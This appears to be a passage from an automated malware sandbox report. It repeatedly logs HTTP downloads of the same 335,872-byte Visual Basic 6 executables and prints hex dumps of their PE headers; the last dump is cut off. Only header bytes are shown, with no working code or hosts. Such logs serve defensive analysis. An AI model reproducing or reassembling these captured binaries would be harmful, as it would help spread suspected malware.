00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:52:43 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:52:44 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:52:49 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:52:49 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:52:50 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:52:51 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:52:51 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:52:51 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 